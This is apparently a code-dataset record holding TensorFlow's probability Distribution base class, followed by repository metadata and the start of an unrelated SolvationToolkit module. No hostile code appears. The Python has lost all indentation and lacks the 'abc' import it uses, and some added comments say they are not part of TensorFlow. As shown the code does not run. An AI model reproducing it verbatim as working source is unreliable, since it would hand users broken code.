import contextlib
import types
import numpy as np
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import util
from tensorflow.python.util import tf_inspect
_DISTRIBUTION_PUBLIC_METHOD_WRAPPERS = [
"batch_shape_tensor", "batch_shape", "event_shape_tensor", "event_shape",
"sample", "log_prob", "prob", "log_cdf", "cdf", "log_survival_function",
"survival_function", "entropy", "mean", "variance", "stddev", "mode",
"covariance"]
@six.add_metaclass(abc.ABCMeta)
class _BaseDistribution(object):
"""Abstract base class needed for resolving subclass hierarchy."""
pass
def _copy_fn(fn):
"""Create a deep copy of fn.
Args:
fn: a callable
Returns:
A `FunctionType`: a deep copy of fn.
Raises:
TypeError: if `fn` is not a callable.
"""
if not callable(fn):
raise TypeError("fn is not callable: %s" % fn)
# The blessed way to copy a function. copy.deepcopy fails to create a
# non-reference copy. Since:
# types.FunctionType == type(lambda: None),
# and the docstring for the function type states:
#
# function(code, globals[, name[, argdefs[, closure]]])
#
# Create a function object from a code object and a dictionary.
# ...
#
# Here we can use this to create a new function with the old function's
# code, globals, closure, etc.
return types.FunctionType(
code=fn.__code__, globals=fn.__globals__,
name=fn.__name__, argdefs=fn.__defaults__,
closure=fn.__closure__)
def _update_docstring(old_str, append_str):
"""Update old_str by inserting append_str just before the "Args:" section."""
old_str = old_str or ""
old_str_lines = old_str.split("\n")
# Step 0: Prepend spaces to all lines of append_str. This is
# necessary for correct markdown generation.
append_str = "\n".join(" %s" % line for line in append_str.split("\n"))
# Step 1: Find mention of "Args":
has_args_ix = [
ix for ix, line in enumerate(old_str_lines)
if line.strip().lower() == "args:"]
if has_args_ix:
final_args_ix = has_args_ix[-1]
return ("\n".join(old_str_lines[:final_args_ix])
+ "\n\n" + append_str + "\n\n"
+ "\n".join(old_str_lines[final_args_ix:]))
else:
return old_str + "\n\n" + append_str
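# Illustrative behavior (a hedged sketch, not part of TensorFlow): given
#   old_str    = "Summary.\n\nArgs:\n  x: input."
#   append_str = "Extra note."
# the helper indents the note by four spaces and splices it in just before
# the last "Args:" line, yielding
#   "Summary.\n\n\n    Extra note.\n\nArgs:\n  x: input."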
class _DistributionMeta(abc.ABCMeta):
def __new__(mcs, classname, baseclasses, attrs):
"""Control the creation of subclasses of the Distribution class.
The main purpose of this method is to properly propagate docstrings
from private Distribution methods, like `_log_prob`, into their
public wrappers as inherited by the Distribution base class
(e.g. `log_prob`).
Args:
classname: The name of the subclass being created.
baseclasses: A tuple of parent classes.
attrs: A dict mapping new attributes to their values.
Returns:
The class object.
Raises:
TypeError: If `Distribution` is not a subclass of `BaseDistribution`, or
the new class is derived via multiple inheritance and the first
parent class is not a subclass of `BaseDistribution`.
AttributeError: If `Distribution` does not implement e.g. `log_prob`.
ValueError: If a `Distribution` public method lacks a docstring.
"""
if not baseclasses: # Nothing to be done for Distribution
raise TypeError("Expected non-empty baseclass. Does Distribution "
"not subclass _BaseDistribution?")
which_base = [
base for base in baseclasses
if base == _BaseDistribution or issubclass(base, Distribution)]
base = which_base[0]
if base == _BaseDistribution: # Nothing to be done for Distribution
return abc.ABCMeta.__new__(mcs, classname, baseclasses, attrs)
if not issubclass(base, Distribution):
raise TypeError("First parent class declared for %s must be "
"Distribution, but saw '%s'" % (classname, base.__name__))
for attr in _DISTRIBUTION_PUBLIC_METHOD_WRAPPERS:
special_attr = "_%s" % attr
class_attr_value = attrs.get(attr, None)
if attr in attrs:
# The method is being overridden, do not update its docstring
continue
base_attr_value = getattr(base, attr, None)
if not base_attr_value:
raise AttributeError(
"Internal error: expected base class '%s' to implement method '%s'"
% (base.__name__, attr))
class_special_attr_value = attrs.get(special_attr, None)
if class_special_attr_value is None:
# No _special method available, no need to update the docstring.
continue
class_special_attr_docstring = tf_inspect.getdoc(class_special_attr_value)
if not class_special_attr_docstring:
# No docstring to append.
continue
class_attr_value = _copy_fn(base_attr_value)
class_attr_docstring = tf_inspect.getdoc(base_attr_value)
if class_attr_docstring is None:
raise ValueError(
"Expected base class fn to contain a docstring: %s.%s"
% (base.__name__, attr))
class_attr_value.__doc__ = _update_docstring(
class_attr_value.__doc__,
("Additional documentation from `%s`:\n\n%s"
% (classname, class_special_attr_docstring)))
attrs[attr] = class_attr_value
return abc.ABCMeta.__new__(mcs, classname, baseclasses, attrs)
class ReparameterizationType(object):
"""Instances of this class represent how sampling is reparameterized.
Two static instances exist in the distributions library, signifying
one of two possible properties for samples from a distribution:
`FULLY_REPARAMETERIZED`: Samples from the distribution are fully
reparameterized, and straight-through gradients are supported.
`NOT_REPARAMETERIZED`: Samples from the distribution are not fully
reparameterized, and straight-through gradients are either partially
unsupported or are not supported at all. In this case, for purposes of
e.g. RL or variational inference, it is generally safest to wrap the
sample results in a `stop_gradient` call and use policy
gradients / surrogate loss instead.
"""
def __init__(self, rep_type):
self._rep_type = rep_type
def __repr__(self):
return "<Reparameteriation Type: %s>" % self._rep_type
def __eq__(self, other):
"""Determine if this `ReparameterizationType` is equal to another.
Since ReparameterizationType instances are constant static global
instances, equality checks if two instances' id() values are equal.
Args:
other: Object to compare against.
Returns:
`self is other`.
"""
return self is other
# Fully reparameterized distribution: samples from a fully
# reparameterized distribution support straight-through gradients with
# respect to all parameters.
FULLY_REPARAMETERIZED = ReparameterizationType("FULLY_REPARAMETERIZED")
# Not reparameterized distribution: samples from a non-
# reparameterized distribution do not support straight-through gradients for
# at least some of the parameters.
NOT_REPARAMETERIZED = ReparameterizationType("NOT_REPARAMETERIZED")
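# Hedged usage sketch (not part of this module): because the two instances
# are compared by identity, client code can branch on the property directly:
#
#   if dist.reparameterization_type is FULLY_REPARAMETERIZED:
#       pass  # pathwise (straight-through) gradients are supported
#   else:
#       pass  # e.g. fall back to score-function / surrogate-loss estimators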
@six.add_metaclass(_DistributionMeta)
class Distribution(_BaseDistribution):
"""A generic probability distribution base class.
`Distribution` is a base class for constructing and organizing properties
(e.g., mean, variance) of random variables (e.g., Bernoulli, Gaussian).
#### Subclassing
Subclasses are expected to implement a leading-underscore version of the
same-named function. The argument signature should be identical except for
the omission of `name="..."`. For example, to enable `log_prob(value,
name="log_prob")` a subclass should implement `_log_prob(value)`.
Subclasses can append to public-level docstrings by providing
docstrings for their method specializations. For example:
```python
@util.AppendDocstring("Some other details.")
def _log_prob(self, value):
...
```
would add the string "Some other details." to the `log_prob` function
docstring. This is implemented as a simple decorator to avoid python
linter complaining about missing Args/Returns/Raises sections in the
partial docstrings.
#### Broadcasting, batching, and shapes
All distributions support batches of independent distributions of that type.
The batch shape is determined by broadcasting together the parameters.
The shape of arguments to `__init__`, `cdf`, `log_cdf`, `prob`, and
`log_prob` reflect this broadcasting, as does the return value of `sample` and
`sample_n`.
`sample_n_shape = [n] + batch_shape + event_shape`, where `sample_n_shape` is
the shape of the `Tensor` returned from `sample_n`, `n` is the number of
samples, `batch_shape` defines how many independent distributions there are,
and `event_shape` defines the shape of samples from each of those independent
distributions. Samples are independent along the `batch_shape` dimensions, but
not necessarily so along the `event_shape` dimensions (depending on the
particulars of the underlying distribution).
Using the `Uniform` distribution as an example:
```python
minval = 3.0
maxval = [[4.0, 6.0],
[10.0, 12.0]]
# Broadcasting:
# This instance represents 4 Uniform distributions. Each has a lower bound at
# 3.0 as the `minval` parameter was broadcasted to match `maxval`'s shape.
u = Uniform(minval, maxval)
# `event_shape` is `TensorShape([])`.
event_shape = u.event_shape
# `event_shape_t` is a `Tensor` which will evaluate to [].
event_shape_t = u.event_shape_tensor()
# Sampling returns a sample per distribution. `samples` has shape
# [5, 2, 2], which is [n] + batch_shape + event_shape, where n=5,
# batch_shape=[2, 2], and event_shape=[].
samples = u.sample_n(5)
# The broadcasting holds across methods. Here we use `cdf` as an example. The
# same holds for `log_cdf` and the likelihood functions.
# `cum_prob` has shape [2, 2] as the `value` argument was broadcasted to the
# shape of the `Uniform` instance.
cum_prob_broadcast = u.cdf(4.0)
# `cum_prob`'s shape is [2, 2], one per distribution. No broadcasting
# occurred.
cum_prob_per_dist = u.cdf([[4.0, 5.0],
[6.0, 7.0]])
# INVALID as the `value` argument is not broadcastable to the distribution's
# shape.
cum_prob_invalid = u.cdf([4.0, 5.0, 6.0])
```
#### Parameter values leading to undefined statistics or distributions.
Some distributions do not have well-defined statistics for all initialization
parameter values. For example, the beta distribution is parameterized by
positive real numbers `concentration1` and `concentration0`, and does not have
well-defined mode if `concentration1 < 1` or `concentration0 < 1`.
The user is given the option of raising an exception or returning `NaN`.
```python
a = tf.exp(tf.matmul(logits, weights_a))
b = tf.exp(tf.matmul(logits, weights_b))
# Will raise exception if ANY batch member has a < 1 or b < 1.
dist = distributions.beta(a, b, allow_nan_stats=False)
mode = dist.mode().eval()
# Will return NaN for batch members with either a < 1 or b < 1.
dist = distributions.beta(a, b, allow_nan_stats=True) # Default behavior
mode = dist.mode().eval()
```
In all cases, an exception is raised if *invalid* parameters are passed, e.g.
```python
# Will raise an exception if any Op is run.
negative_a = -1.0 * a # beta distribution by definition has a > 0.
dist = distributions.beta(negative_a, b, allow_nan_stats=True)
dist.mean().eval()
```
"""
def __init__(self,
dtype,
reparameterization_type,
validate_args,
allow_nan_stats,
parameters=None,
graph_parents=None,
name=None):
"""Constructs the `Distribution`.
**This is a private method for subclass use.**
Args:
dtype: The type of the event samples. `None` implies no type-enforcement.
reparameterization_type: Instance of `ReparameterizationType`.
If `distributions.FULLY_REPARAMETERIZED`, this
`Distribution` can be reparameterized in terms of some standard
distribution with a function whose Jacobian is constant for the support
of the standard distribution. If `distributions.NOT_REPARAMETERIZED`,
then no such reparameterization is available.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
parameters: Python `dict` of parameters used to instantiate this
`Distribution`.
graph_parents: Python `list` of graph prerequisites of this
`Distribution`.
name: Python `str` name prefixed to Ops created by this class. Default:
subclass name.
Raises:
ValueError: if any member of graph_parents is `None` or not a `Tensor`.
"""
graph_parents = [] if graph_parents is None else graph_parents
for i, t in enumerate(graph_parents):
if t is None or not tensor_util.is_tensor(t):
raise ValueError("Graph parent item %d is not a Tensor; %s." % (i, t))
self._dtype = dtype
self._reparameterization_type = reparameterization_type
self._allow_nan_stats = allow_nan_stats
self._validate_args = validate_args
self._parameters = parameters or {}
self._graph_parents = graph_parents
self._name = name or type(self).__name__
@classmethod
def param_shapes(cls, sample_shape, name="DistributionParamShapes"):
"""Shapes of parameters given the desired shape of a call to `sample()`.
This is a class method that describes what key/value arguments are required
to instantiate the given `Distribution` so that a particular shape is
returned for that instance's call to `sample()`.
Subclasses should override class method `_param_shapes`.
Args:
sample_shape: `Tensor` or python list/tuple. Desired shape of a call to
`sample()`.
name: name to prepend ops with.
Returns:
`dict` of parameter name to `Tensor` shapes.
"""
with ops.name_scope(name, values=[sample_shape]):
return cls._param_shapes(sample_shape)
@classmethod
def param_static_shapes(cls, sample_shape):
"""param_shapes with static (i.e. `TensorShape`) shapes.
This is a class method that describes what key/value arguments are required
to instantiate the given `Distribution` so that a particular shape is
returned for that instance's call to `sample()`. Assumes that the sample's
shape is known statically.
Subclasses should override class method `_param_shapes` to return
constant-valued tensors when constant values are fed.
Args:
sample_shape: `TensorShape` or python list/tuple. Desired shape of a call
to `sample()`.
Returns:
`dict` of parameter name to `TensorShape`.
Raises:
ValueError: if `sample_shape` is a `TensorShape` and is not fully defined.
"""
if isinstance(sample_shape, tensor_shape.TensorShape):
if not sample_shape.is_fully_defined():
raise ValueError("TensorShape sample_shape must be fully defined")
sample_shape = sample_shape.as_list()
params = cls.param_shapes(sample_shape)
static_params = {}
for name, shape in params.items():
static_shape = tensor_util.constant_value(shape)
if static_shape is None:
raise ValueError(
"sample_shape must be a fully-defined TensorShape or list/tuple")
static_params[name] = tensor_shape.TensorShape(static_shape)
return static_params
@staticmethod
def _param_shapes(sample_shape):
raise NotImplementedError("_param_shapes not implemented")
@property
def name(self):
"""Name prepended to all ops created by this `Distribution`."""
return self._name
@property
def dtype(self):
"""The `DType` of `Tensor`s handled by this `Distribution`."""
return self._dtype
@property
def parameters(self):
"""Dictionary of parameters used to instantiate this `Distribution`."""
# Remove "self", "__class__", or other special variables. These can appear
# if the subclass used `parameters = locals()`.
return dict((k, v) for k, v in self._parameters.items()
if not k.startswith("__") and k != "self")
@property
def reparameterization_type(self):
"""Describes how samples from the distribution are reparameterized.
Currently this is one of the static instances
`distributions.FULLY_REPARAMETERIZED`
or `distributions.NOT_REPARAMETERIZED`.
Returns:
An instance of `ReparameterizationType`.
"""
return self._reparameterization_type
@property
def allow_nan_stats(self):
"""Python `bool` describing behavior when a stat is undefined.
Stats return +/- infinity when it makes sense. E.g., the variance of a
Cauchy distribution is infinity. However, sometimes the statistic is
undefined, e.g., if a distribution's pdf does not achieve a maximum within
the support of the distribution, the mode is undefined. If the mean is
undefined, then by definition the variance is undefined. E.g. the mean for
Student's T for df = 1 is undefined (no clear way to say it is either + or -
infinity), so the variance = E[(X - mean)**2] is also undefined.
Returns:
allow_nan_stats: Python `bool`.
"""
return self._allow_nan_stats
@property
def validate_args(self):
"""Python `bool` indicating possibly expensive checks are enabled."""
return self._validate_args
def copy(self, **override_parameters_kwargs):
"""Creates a deep copy of the distribution.
Note: the copy distribution may continue to depend on the original
initialization arguments.
Args:
**override_parameters_kwargs: String/value dictionary of initialization
arguments to override with new values.
Returns:
distribution: A new instance of `type(self)` initialized from the union
of self.parameters and override_parameters_kwargs, i.e.,
`dict(self.parameters, **override_parameters_kwargs)`.
"""
parameters = dict(self.parameters, **override_parameters_kwargs)
return type(self)(**parameters)
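# Hedged illustration (not part of TensorFlow): for a hypothetical Normal
# subclass constructed as Normal(loc=0., scale=1.), `normal.copy(loc=1.)`
# re-instantiates it with the original scale and the overridden loc, i.e.
# type(normal)(**dict(normal.parameters, loc=1.)).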
def _batch_shape_tensor(self):
raise NotImplementedError("batch_shape_tensor is not implemented")
def batch_shape_tensor(self, name="batch_shape_tensor"):
"""Shape of a single sample from a single event index as a 1-D `Tensor`.
The batch dimensions are indexes into independent, non-identical
parameterizations of this distribution.
Args:
name: name to give to the op
Returns:
batch_shape: `Tensor`.
"""
with self._name_scope(name):
if self.batch_shape.is_fully_defined():
return ops.convert_to_tensor(self.batch_shape.as_list(),
dtype=dtypes.int32,
name="batch_shape")
return self._batch_shape_tensor()
def _batch_shape(self):
return tensor_shape.TensorShape(None)
@property
def batch_shape(self):
"""Shape of a single sample from a single event index as a `TensorShape`.
May be partially defined or unknown.
The batch dimensions are indexes into independent, non-identical
parameterizations of this distribution.
Returns:
batch_shape: `TensorShape`, possibly unknown.
"""
return self._batch_shape()
def _event_shape_tensor(self):
raise NotImplementedError("event_shape_tensor is not implemented")
def event_shape_tensor(self, name="event_shape_tensor"):
"""Shape of a single sample from a single batch as a 1-D int32 `Tensor`.
Args:
name: name to give to the op
Returns:
event_shape: `Tensor`.
"""
with self._name_scope(name):
if self.event_shape.is_fully_defined():
return ops.convert_to_tensor(self.event_shape.as_list(),
dtype=dtypes.int32,
name="event_shape")
return self._event_shape_tensor()
def _event_shape(self):
return tensor_shape.TensorShape(None)
@property
def event_shape(self):
"""Shape of a single sample from a single batch as a `TensorShape`.
May be partially defined or unknown.
Returns:
event_shape: `TensorShape`, possibly unknown.
"""
return self._event_shape()
def is_scalar_event(self, name="is_scalar_event"):
"""Indicates that `event_shape == []`.
Args:
name: The name to give this op.
Returns:
is_scalar_event: `bool` scalar `Tensor`.
"""
with self._name_scope(name):
return ops.convert_to_tensor(
self._is_scalar_helper(self.event_shape, self.event_shape_tensor),
name="is_scalar_event")
def is_scalar_batch(self, name="is_scalar_batch"):
"""Indicates that `batch_shape == []`.
Args:
name: The name to give this op.
Returns:
is_scalar_batch: `bool` scalar `Tensor`.
"""
with self._name_scope(name):
return ops.convert_to_tensor(
self._is_scalar_helper(self.batch_shape, self.batch_shape_tensor),
name="is_scalar_batch")
def _sample_n(self, n, seed=None):
raise NotImplementedError("sample_n is not implemented")
def _call_sample_n(self, sample_shape, seed, name, **kwargs):
with self._name_scope(name, values=[sample_shape]):
sample_shape = ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32, name="sample_shape")
sample_shape, n = self._expand_sample_shape_to_vector(
sample_shape, "sample_shape")
samples = self._sample_n(n, seed, **kwargs)
batch_event_shape = array_ops.shape(samples)[1:]
final_shape = array_ops.concat([sample_shape, batch_event_shape], 0)
samples = array_ops.reshape(samples, final_shape)
samples = self._set_sample_static_shape(samples, sample_shape)
return samples
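  # Shape bookkeeping sketch (illustrative): `_sample_n` returns samples with a
  # single leading dimension n = prod(sample_shape); the reshape above
  # re-expands that flat dimension. E.g. with sample_shape=[2, 3],
  # batch_shape=[4] and scalar events, samples go from [6, 4] to [2, 3, 4].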
def sample(self, sample_shape=(), seed=None, name="sample"):
"""Generate samples of the specified shape.
Note that a call to `sample()` without arguments will generate a single
sample.
Args:
sample_shape: 0D or 1D `int32` `Tensor`. Shape of the generated samples.
seed: Python integer seed for RNG
name: name to give to the op.
Returns:
samples: a `Tensor` with prepended dimensions `sample_shape`.
"""
return self._call_sample_n(sample_shape, seed, name)
def _log_prob(self, value):
raise NotImplementedError("log_prob is not implemented")
def _call_log_prob(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._log_prob(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.log(self._prob(value, **kwargs))
except NotImplementedError:
raise original_exception
def log_prob(self, value, name="log_prob"):
"""Log probability density/mass function.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
log_prob: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_log_prob(value, name)
def _prob(self, value):
raise NotImplementedError("prob is not implemented")
def _call_prob(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._prob(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.exp(self._log_prob(value, **kwargs))
except NotImplementedError:
raise original_exception
def prob(self, value, name="prob"):
"""Probability density/mass function.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
prob: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_prob(value, name)
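  # Implementation note (illustrative): `_call_log_prob` and `_call_prob` fall
  # back on each other, so a subclass only needs to provide one hook. A minimal
  # hypothetical subclass could implement just `_prob`:
  #   class Uniform01(Distribution):
  #     def _prob(self, value):
  #       return array_ops.ones_like(value)  # density 1 on [0, 1]
  # and `log_prob` would then be derived automatically as log(prob(value)).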
def _log_cdf(self, value):
raise NotImplementedError("log_cdf is not implemented")
def _call_log_cdf(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._log_cdf(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.log(self._cdf(value, **kwargs))
except NotImplementedError:
raise original_exception
def log_cdf(self, value, name="log_cdf"):
"""Log cumulative distribution function.
Given random variable `X`, the cumulative distribution function `cdf` is:
```none
log_cdf(x) := Log[ P[X <= x] ]
```
Often, a numerical approximation can be used for `log_cdf(x)` that yields
a more accurate answer than simply taking the logarithm of the `cdf` when
`x << -1`.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
logcdf: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_log_cdf(value, name)
def _cdf(self, value):
raise NotImplementedError("cdf is not implemented")
def _call_cdf(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._cdf(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.exp(self._log_cdf(value, **kwargs))
except NotImplementedError:
raise original_exception
def cdf(self, value, name="cdf"):
"""Cumulative distribution function.
Given random variable `X`, the cumulative distribution function `cdf` is:
```none
cdf(x) := P[X <= x]
```
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
cdf: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_cdf(value, name)
def _log_survival_function(self, value):
raise NotImplementedError("log_survival_function is not implemented")
def _call_log_survival_function(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._log_survival_function(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.log1p(-self.cdf(value, **kwargs))
except NotImplementedError:
raise original_exception
def log_survival_function(self, value, name="log_survival_function"):
"""Log survival function.
Given random variable `X`, the survival function is defined:
```none
log_survival_function(x) = Log[ P[X > x] ]
= Log[ 1 - P[X <= x] ]
= Log[ 1 - cdf(x) ]
```
Typically, different numerical approximations can be used for the log
survival function, which are more accurate than `1 - cdf(x)` when `x >> 1`.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
`Tensor` of shape `sample_shape(x) + self.batch_shape` with values of type
`self.dtype`.
"""
return self._call_log_survival_function(value, name)
def _survival_function(self, value):
raise NotImplementedError("survival_function is not implemented")
def _call_survival_function(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._survival_function(value, **kwargs)
except NotImplementedError as original_exception:
try:
return 1. - self.cdf(value, **kwargs)
except NotImplementedError:
raise original_exception
def survival_function(self, value, name="survival_function"):
"""Survival function.
Given random variable `X`, the survival function is defined:
```none
survival_function(x) = P[X > x]
= 1 - P[X <= x]
= 1 - cdf(x).
```
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
`Tensor` of shape `sample_shape(x) + self.batch_shape` with values of type
`self.dtype`.
"""
return self._call_survival_function(value, name)
def _entropy(self):
raise NotImplementedError("entropy is not implemented")
def entropy(self, name="entropy"):
"""Shannon entropy in nats."""
with self._name_scope(name):
return self._entropy()
def _mean(self):
raise NotImplementedError("mean is not implemented")
def mean(self, name="mean"):
"""Mean."""
with self._name_scope(name):
return self._mean()
def _quantile(self, value):
raise NotImplementedError("quantile is not implemented")
def _call_quantile(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
      return self._quantile(value, **kwargs)
def quantile(self, value, name="quantile"):
"""Quantile function. Aka "inverse cdf" or "percent point function".
Given random variable `X` and `p in [0, 1]`, the `quantile` is:
```none
quantile(p) := x such that P[X <= x] == p
```
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
quantile: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_quantile(value, name)
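  # Illustrative identity (assuming a continuous, strictly increasing cdf):
  # `quantile` inverts `cdf`, i.e. quantile(cdf(x)) == x and
  # cdf(quantile(p)) == p for p in (0, 1).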
def _variance(self):
raise NotImplementedError("variance is not implemented")
def variance(self, name="variance"):
"""Variance.
Variance is defined as,
```none
Var = E[(X - E[X])**2]
```
where `X` is the random variable associated with this distribution, `E`
denotes expectation, and `Var.shape = batch_shape + event_shape`.
Args:
name: The name to give this op.
Returns:
variance: Floating-point `Tensor` with shape identical to
`batch_shape + event_shape`, i.e., the same shape as `self.mean()`.
"""
with self._name_scope(name):
try:
return self._variance()
except NotImplementedError as original_exception:
try:
return math_ops.square(self._stddev())
except NotImplementedError:
raise original_exception
def _stddev(self):
raise NotImplementedError("stddev is not implemented")
def stddev(self, name="stddev"):
"""Standard deviation.
Standard deviation is defined as,
```none
stddev = E[(X - E[X])**2]**0.5
```
where `X` is the random variable associated with this distribution, `E`
denotes expectation, and `stddev.shape = batch_shape + event_shape`.
Args:
name: The name to give this op.
Returns:
stddev: Floating-point `Tensor` with shape identical to
`batch_shape + event_shape`, i.e., the same shape as `self.mean()`.
"""
with self._name_scope(name):
try:
return self._stddev()
except NotImplementedError as original_exception:
try:
return math_ops.sqrt(self._variance())
except NotImplementedError:
raise original_exception
def _covariance(self):
raise NotImplementedError("covariance is not implemented")
def covariance(self, name="covariance"):
"""Covariance.
Covariance is (possibly) defined only for non-scalar-event distributions.
For example, for a length-`k`, vector-valued distribution, it is calculated
as,
```none
Cov[i, j] = Covariance(X_i, X_j) = E[(X_i - E[X_i]) (X_j - E[X_j])]
```
where `Cov` is a (batch of) `k x k` matrix, `0 <= (i, j) < k`, and `E`
denotes expectation.
Alternatively, for non-vector, multivariate distributions (e.g.,
matrix-valued, Wishart), `Covariance` shall return a (batch of) matrices
under some vectorization of the events, i.e.,
```none
Cov[i, j] = Covariance(Vec(X)_i, Vec(X)_j) = [as above]
```
where `Cov` is a (batch of) `k' x k'` matrices,
`0 <= (i, j) < k' = reduce_prod(event_shape)`, and `Vec` is some function
mapping indices of this distribution's event dimensions to indices of a
length-`k'` vector.
Args:
name: The name to give this op.
Returns:
covariance: Floating-point `Tensor` with shape `[B1, ..., Bn, k', k']`
where the first `n` dimensions are batch coordinates and
`k' = reduce_prod(self.event_shape)`.
"""
with self._name_scope(name):
return self._covariance()
def _mode(self):
raise NotImplementedError("mode is not implemented")
def mode(self, name="mode"):
"""Mode."""
with self._name_scope(name):
return self._mode()
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=(
([] if values is None else values) + self._graph_parents)) as scope:
yield scope
def _expand_sample_shape_to_vector(self, x, name):
"""Helper to `sample` which ensures input is 1D."""
x_static_val = tensor_util.constant_value(x)
if x_static_val is None:
prod = math_ops.reduce_prod(x)
else:
prod = np.prod(x_static_val, dtype=x.dtype.as_numpy_dtype())
ndims = x.get_shape().ndims # != sample_ndims
if ndims is None:
# Maybe expand_dims.
ndims = array_ops.rank(x)
expanded_shape = util.pick_vector(
math_ops.equal(ndims, 0),
np.array([1], dtype=np.int32), array_ops.shape(x))
x = array_ops.reshape(x, expanded_shape)
elif ndims == 0:
# Definitely expand_dims.
if x_static_val is not None:
x = ops.convert_to_tensor(
np.array([x_static_val], dtype=x.dtype.as_numpy_dtype()),
name=name)
else:
x = array_ops.reshape(x, [1])
elif ndims != 1:
raise ValueError("Input is neither scalar nor vector.")
return x, prod
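  # Illustrative behavior: a scalar sample_shape 5 is reshaped to the vector
  # [5] with prod = 5; a vector [2, 3] is returned unchanged with prod = 6;
  # any input of rank > 1 raises a ValueError.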
def _set_sample_static_shape(self, x, sample_shape):
"""Helper to `sample`; sets static shape info."""
# Set shape hints.
sample_shape = tensor_shape.TensorShape(
tensor_util.constant_value(sample_shape))
ndims = x.get_shape().ndims
sample_ndims = sample_shape.ndims
batch_ndims = self.batch_shape.ndims
event_ndims = self.event_shape.ndims
# Infer rank(x).
if (ndims is None and
sample_ndims is not None and
batch_ndims is not None and
event_ndims is not None):
ndims = sample_ndims + batch_ndims + event_ndims
x.set_shape([None] * ndims)
# Infer sample shape.
if ndims is not None and sample_ndims is not None:
shape = sample_shape.concatenate([None]*(ndims - sample_ndims))
x.set_shape(x.get_shape().merge_with(shape))
# Infer event shape.
if ndims is not None and event_ndims is not None:
shape = tensor_shape.TensorShape(
[None]*(ndims - event_ndims)).concatenate(self.event_shape)
x.set_shape(x.get_shape().merge_with(shape))
# Infer batch shape.
if batch_ndims is not None:
if ndims is not None:
if sample_ndims is None and event_ndims is not None:
sample_ndims = ndims - batch_ndims - event_ndims
elif event_ndims is None and sample_ndims is not None:
event_ndims = ndims - batch_ndims - sample_ndims
if sample_ndims is not None and event_ndims is not None:
shape = tensor_shape.TensorShape([None]*sample_ndims).concatenate(
self.batch_shape).concatenate([None]*event_ndims)
x.set_shape(x.get_shape().merge_with(shape))
return x
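  # Illustrative example: with sample_shape=[2], batch_shape=[3] and
  # event_shape=[4], a sample tensor of unknown static shape gets the hint
  # [2, 3, 4] merged in; partially known shapes (e.g. batch_shape=[None])
  # simply leave the corresponding dimensions unknown.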
def _is_scalar_helper(self, static_shape, dynamic_shape_fn):
"""Implementation for `is_scalar_batch` and `is_scalar_event`."""
if static_shape.ndims is not None:
return static_shape.ndims == 0
shape = dynamic_shape_fn()
if (shape.get_shape().ndims is not None and
shape.get_shape()[0].value is not None):
# If the static_shape is correctly written then we should never execute
# this branch. We keep it just in case there's some unimagined corner
# case.
return shape.get_shape().as_list() == [0]
return math_ops.equal(array_ops.shape(shape)[0], 0)
|
maciekcc/tensorflow
|
tensorflow/python/ops/distributions/distribution.py
|
Python
|
apache-2.0
| 38,421
|
[
"Gaussian"
] |
52b1f6e56430215d9be30f1664ecdec5c09c9fe81be83c55c62b8ced99dba09c
|
######################################################################
# SolvationToolkit: A toolkit for setting up molecular simulations of mixtures
# Copyright 2011-2016 UC Irvine and the Authors
#
# Authors: David Mobley and Gaetano Calabro
# With thanks to Kyle Beauchamp, whose liquid_tools.py provided an initial basis for this code
# (https://github.com/choderalab/LiquidBenchmark/blob/master/src/simulation/liquid_tools.py) in April 2015
#
#This library is free software; you can redistribute it and/or
#modify it under the terms of the GNU Lesser General Public
#License as published by the Free Software Foundation; either
#version 2.1 of the License, or (at your option) any later version.
#
#This library is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
#Lesser General Public License for more details.
#
#You should have received a copy of the GNU Lesser General Public
#License along with this library; if not, see <http://www.gnu.org/licenses/>.
######################################################################
import numpy as np
import os,sys
import inspect
import itertools
import mdtraj as md
import parmed
